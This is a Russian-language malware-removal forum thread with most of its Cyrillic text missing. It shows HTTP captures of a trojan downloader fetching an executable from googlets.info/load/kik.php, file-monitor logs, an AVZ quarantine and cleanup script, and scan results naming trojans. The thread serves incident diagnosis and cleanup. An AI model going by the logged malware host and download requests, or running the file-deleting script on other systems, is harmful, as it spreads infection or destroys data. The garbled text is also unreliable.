1 19 19.

( 22861)

  1. #1
    Junior Member
    14.05.2008
    14
    59

    Thumbs up

    ,

    ,
    HTTPLook v1.251:
    :
    66.199.247.90.80
    GET /load/kik.php?v=13&c=22444B4346529E3D&h= HTTP/1.1
    Host: googlets.info
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 9
    :
    HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 13 May 2008 17:00:39 GMT
    Content-Type: text/html; charset=windows-1251
    Connection: keep-alive
    X-Powered-By: PHP/5.2.6
    Content-transfer-encoding: binary
    Content-Length: 18
    P6 ܁H0|֗G2
    c$
    :
    GET /load/kik.php?g=TSIwJQrQlE1AedWVQTUIaOWFbUiATHqEk3BcUVqu dB20D|Hi HTTP/1.1
    Host: googlets.info
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 9
    :
    HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 13 May 2008 17:00:44 GMT
    Content-Type: application/octet-stream
    Connection: keep-alive
    X-Powered-By: PHP/5.2.6
    Content-Length: 31744
    000000 01 4D 68 E4 A2 79 02 4D E2 A1 78 00 C5 AE A0 B6 .Mhy.Mx.Ů
    000010 91 34 D5 6D 4B BC B2 41 2E 60 70 98 44 2F 83 3D 4mKA.`pD/=
    000020 D4 C3 FD AE 43 DE DA 6E 2B E2 22 52 AD 82 12 D3 .Cn+"R­..
    000030 B5 90 E5 55 95 2D B9 7B 98 25 D3 0D 98 9E 65 59 U-{%..eY
    000040 39 B9 4F DE BC BF A1 8B C7 01 96 06 98 C7 CA 9A 9O޼..ʚ
    ........
    .........
    007BC0 C0 D2 DC 9C 31 90 E2 4D 5A 30 1C 48 4D 24 32 75 ܜ1MZ0.HM$2u
    007BD0 50 E1 44 08 30 83 FC A5 E3 22 9F 32 D1 E4 EE E3 PD.0.".2
    007BE0 0C 7A ED A2 66 14 35 0F C2 58 DA DF 53 69 22 CD .z.f.5.XSi"
    007BF0 E3 26 73 13 5C E2 43 39 0B 77 5F 4D 40 C4 E0 B2 &s.\C9.w_M@
    --------------------------------------------------------------------------
    ,
    .. , ?
    php exe-?
    Filemon:
    0:01:48 System:4 IRP_MJ_CLOSE E:\Documents and Settings\All Users.WINDOWS\
    Application Data\Microsoft\Network\Connections\Pbk\rasphone.pb k SUCCESS
    0:01:57 System:4 IRP_MJ_WRITE* E:\DOCUME~1\ALEXKL~1.ALE\LOCALS~1\
    Temp\googlets.info_load_kik.php.htm SUCCESS Ofs: 0 Len: 4096
    0:01:57 System:4 IRP_MJ_SET_INFORMATION*
    ...\Temp\googlets.info_load_kik.php.htm SUCCESS Len: 4096
    0:01:59 System:4 IRP_MJ_WRITE*
    ...\Temp\googlets.info_load_kik.php.Unknown SUCCESS Ofs: 0 Len: 4096
    0:01:59 System:4 IRP_MJ_SET_INFORMATION*
    ...\Temp\googlets.info_load_kik.php.Unknown SUCCESS Len: 4096
    0:01:59 System:4 IRP_MJ_CLOSE
    ...\Temp\googlets.info_load_kik.php.Unknown SUCCESS
    0:02:00 System:4 IRP_MJ_WRITE*
    ...\Temp\googlets.info_load_kik.php.Unknown SUCCESS Ofs: 0 Len: 4096
    0:02:00 System:4 IRP_MJ_SET_INFORMATION*
    ...\Temp\googlets.info_load_kik.php.Unknown SUCCESS Len: 4096
    0:02:00 System:4 IRP_MJ_CLOSE
    ...\Temp\googlets.info_load_kik.php.Unknown SUCCESS
    0:02:01 System:4 IRP_MJ_WRITE*
    ...\Temp\googlets.info_load_kik.php.Unknown SUCCESS Ofs: 0 Len: 4096
    0:02:01 System:4 IRP_MJ_SET_INFORMATION*
    ...\Temp\googlets.info_load_kik.php.Unknown SUCCESS Len: 4096
    0:02:02 System:4 IRP_MJ_WRITE* E: SUCCESS Ofs: 0 Len: 4096
    0:02:02 System:4 IRP_MJ_WRITE* E: SUCCESS Ofs: 118784 Len: 4096
    0:02:02 System:4 IRP_MJ_WRITE* E: SUCCESS Ofs: 1335296 Len: 4096
    0:02:02 System:4 IRP_MJ_WRITE* E: SUCCESS Ofs: 16384 Len: 4096
    0:02:03 System:4 IRP_MJ_CLOSE
    ...\Temp\googlets.info_load_kik.php.Unknown SUCCESS
    0:02:03 System:4 IRP_MJ_WRITE*
    ...\Temp\googlets.info_load_kik.php.Unknown SUCCESS Ofs: 0 Len: 12288
    0:02:03 System:4 IRP_MJ_SET_INFORMATION*
    ...\Temp\googlets.info_load_kik.php.Unknown SUCCESS Len: 12288
    0:02:04 System:4 IRP_MJ_CLOSE
    ...\Temp\googlets.info_load_kik.php.Unknown SUCCESS
    0:02:04 System:4 IRP_MJ_WRITE*
    ...\Temp\googlets.info_load_kik.php.Unknown SUCCESS Ofs: 8192 Len: 8192
    0:02:04 System:4 IRP_MJ_SET_INFORMATION*
    ...\Temp\googlets.info_load_kik.php.Unknown SUCCESS Len: 16384
    0:02:04 System:4 IRP_MJ_CLOSE
    ...\Temp\googlets.info_load_kik.php.Unknown SUCCESS
    0:02:05 System:4 IRP_MJ_WRITE*
    ...\Temp\googlets.info_load_kik.php.Unknown SUCCESS Ofs: 12288 Len: 4096
    0:02:05 System:4 IRP_MJ_WRITE* E: SUCCESS Ofs: 0 Len: 4096
    0:02:05 System:4 IRP_MJ_WRITE* E: SUCCESS Ofs: 0 Len: 4096
    0:02:05 System:4 IRP_MJ_SET_INFORMATION*
    ...\Temp\googlets.info_load_kik.php.Unknown SUCCESS Len: 16384
    0:02:05 System:4 IRP_MJ_CLOSE
    ...\Temp\googlets.info_load_kik.php.Unknown SUCCESS
    0:02:06 System:4 IRP_MJ_WRITE* E: SUCCESS Ofs: 24576 Len: 8192
    0:02:06 System:4 IRP_MJ_WRITE* E: SUCCESS Ofs: 36864 Len: 12288
    0:02:06 System:4 IRP_MJ_WRITE* E: SUCCESS Ofs: 53248 Len: 4096
    0:02:06 System:4 IRP_MJ_WRITE* E: SUCCESS Ofs: 61440 Len: 4096
    0:02:06 System:4 IRP_MJ_WRITE* E: SUCCESS Ofs: 0 Len: 4096
    0:02:06 System:4 IRP_MJ_WRITE* E: SUCCESS Ofs: 16384 Len: 8192
    googlets.info_load_kik.php.Unknown ...
    0:02:11 System:4 IRP_MJ_SET_INFORMATION*
    E:\DOCUME~1\NETWOR~1.000\LOCALS~1\Temp\NT46432.exe SUCCESS Len: 31744
    0:02:14 System:4 IRP_MJ_WRITE*
    ...\Temp\googlets.info_load_kik.php.Unknown SUCCESS Ofs: 12288 Len: 20480
    0:02:14 System:4 IRP_MJ_SET_INFORMATION*
    ...\Temp\googlets.info_load_kik.php.Unknown SUCCESS Len: 32768
    0:02:34 System:4 IRP_MJ_CLOSE
    E:\DOCUME~1\NETWOR~1.000\LOCALS~1\Temp\NT46432.exe SUCCES
    .
    Microsoft, .
    , - .

    .
    66.199.247.90.80
    googlets.info, ?
    - , ,
    . -
    , "" - .
    ,
    .


    .
    .
    .
    XP SP2. , Windows95, IE5, IE6.
    Rene-gad; 14.05.2008 13:57. : Filemon :)

  2. !
      VirusInfo

    ? , Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    Senior Member   drongo
    17.09.2004
    Israel
    7,164
    994
    * ,
    *MyFirefox Portable
    special avz @ rapidshare.com
    md5: 2091925798B7909E010E3F7E328C5F0D

  4. #3
    Junior Member
    14.05.2008
    14
    59
    - http://www.internetmap.info/cgi-bin/...?site_id=30393
    - - "". ?
    IE . , ?

    5 0

    - ,
    , .dat
    ( , - ). . AWZ , - Creative Technology ( Audigy 2ZS), ( ) SHELL. , ,
    . , - .
    - , . :
    >> : SSDPSRV ( SSDP)
    >> : Schedule ( )

    , . . , .
    , . .
    - , ,

    .

    - , , ( , , , - 66.199.247.90 ), , , .
    AlexKlm; 14.05.2008 19:09. :

  5. #4
    Junior Member
    14.05.2008
    14
    59

    .

    ! , , . . google.com ( - ). , , - . - . , .

  6. #5
    Senior Member   AndreyKa
    08.01.2005
    13,632
    1315
    .

  7. #6
    Junior Member
    14.05.2008
    14
    59

    ''. - .

  8. #7
    Junior Member
    14.05.2008
    14
    59
    hostes lmhost.sam - , - ! IE6. TCP -(). . 80 , .
    AlexKlm; 16.05.2008 15:43.

  9. #8
    Senior Member   AndreyKa
    08.01.2005
    13,632
    1315
    AVZ.
    :
    :
    begin
     SetAVZGuardStatus(True);
     ClearQuarantine;
     QuarantineFile('E:\WINDOWS\system32\basemaqev32.dll','');
     QuarantineFile('D:\autorun.exe','');
     QuarantineFile('D:\autorun.inf','');
     QuarantineFile('C:\MYutil\TdiMonNt\Viruses\gon.exe','');
     QuarantineFile('C:\MYutil\TdiMonNt\Viruses\pinch.exe','');
     QuarantineFile('C:\MYutil\TdiMonNt\Viruses\Windows\winlogon.exe','');
     QuarantineFile('D:\\Crackz\WarezP2P_CWS.exe','');
     QuarantineFile('E:\WINDOWS\winlogon.exe','');
     DeleteFile('C:\BATC\MAIL\NataKlm\Attach\FOTO.ZIP');
     DeleteFileMask('C:\System Volume Information\_restore{7EB25BA4-1249-4D63-B0D8-728091AE44AD}', '*.*', true);
     BC_ImportAll;
     ExecuteSysClean;
     BC_Activate;
     RebootWindows(false);
    end.
    .
    , , 3 http://virusinfo.info/upload_virus.php?tid=22861

  10. #9
    Junior Member
    14.05.2008
    14
    59
    , ! . - - , - . - ( ) , . , . - . . . , .

    : google.com (ru), . - . , hosts , (), , .
    - ? ?

    1 37


    080516_115343_Quarantine_482dbc179aaaa.zip
    955267
    MD5 34c24be845f57be9faba813738709658

    : gon.exe - winlogon.exe, .
    , CMD.exe, - .
    , PEB_LDR_DATA->LIST_ENTRY , - 3 . ( ) . found[1].exe, AWZ .. kernel32 . , found.php . , , .
    AlexKlm; 16.05.2008 21:12. :

  11. #10
    Senior Member   AndreyKa
    08.01.2005
    13,632
    1315
    C:\MYutil\TdiMonNt\Viruses .
    D:\\Crackz\WarezP2P_CWS.exe - Downloader.Win32.Agent.h (Trojan.DownLoader.10412)
    C:\BATC\\Dorithie.zip - Trojan-Downloader.Win32.Bagle.g
    F:\_Distr\\secret-porn-video.zip - Backdoor.Win32.Delf.co
    , , ...
    AlexKlm
    - . .
    HIPS. . , Windows , ( ) IE .
    10- .

  12. #11
    Junior Member
    14.05.2008
    14
    59
    . , ,
    . , . , , . .

    autorun.exe , - , .
    . .

    . hosts lmhost, .

    . .

  13. #12
    Junior Member
    14.05.2008
    14
    59
    10.
    , MyUtil AWZ
    , . Viruses3.zip, , !, AWZ . .
    drongo; 17.05.2008 21:40.

  14. #13
    Senior Helper
    10.01.2007
    22,817
    1524
    ( , )... ...

  15. #14
    Senior Member   drongo
    17.09.2004
    Israel
    7,164
    994
    * ,
    *MyFirefox Portable
    special avz @ rapidshare.com
    md5: 2091925798B7909E010E3F7E328C5F0D

  16. #15
    Senior Member   AndreyKa
    08.01.2005
    13,632
    1315
    autorun.exe , , "AutoPlay Menu Loader" Linasoft.
    .
    - E:\WINDOWS\system32\basemaqev32.dll .
    ?

  17. #16
    Junior Member
    14.05.2008
    14
    59
    , . . , 80 TDIMon.

    " " -
    , . - , , , . . dll, - . , .

  18. #17
    Senior Member   AndreyKa
    08.01.2005
    13,632
    1315
    AlexKlm
    " -
    , .
    ...
    dll, - . , .
    "" - .
    dll .

  19. #18
    Junior Member
    14.05.2008
    14
    59
    , , , . , .

  20. #19
    Cybernetic Helper
    29.12.2008
    48,233
    977

    :
    • : 1
    • : 16
    • :
      1. c:\\myutil\\tdimonnt\\viruses\\gon.exe - Trojan-Proxy.Win32.Small.oo (DrWEB: Trojan.Packed.573)
      2. c:\\myutil\\tdimonnt\\viruses\\pinch.exe - Trojan.Win32.Buzus.gqw (DrWEB: Trojan.PWS.LDPinch.1941)
      3. c:\\myutil\\tdimonnt\\viruses\\windows\\winlogon.e xe - Trojan-Proxy.Win32.Small.oo (DrWEB: Trojan.Packed.573)
      4. d:\\\\crackz\\warezp2p_cws.exe - not-a-virusownloader.Win32.Agent.h (DrWEB: Trojan.DownLoader.10412)
      5. e:\\windows\\system32\\basemaqev32.dll - Trojan.Win32.SubSys.dl (DrWEB: Trojan.Okuks.based)


  • () AlexKlm, .

    :

     

     

    , - Anti-Malware.ru:

     

     

    Anti-Malware VK

     

    Anti-Malware Telegram

     

     

    !

     

    , .

    1. larik218 !
      : 0
      : 13.10.2010, 16:37
    2. : 7
      : 01.08.2010, 17:14
    3. !
      : 12
      : 27.03.2009, 11:35
    4. !
      : 1
      : 15.03.2009, 18:13
    5. dReaMer !
      : 14
      : 22.02.2009, 06:05

    /

    •  
    Page generated in 0.00372 seconds with 20 queries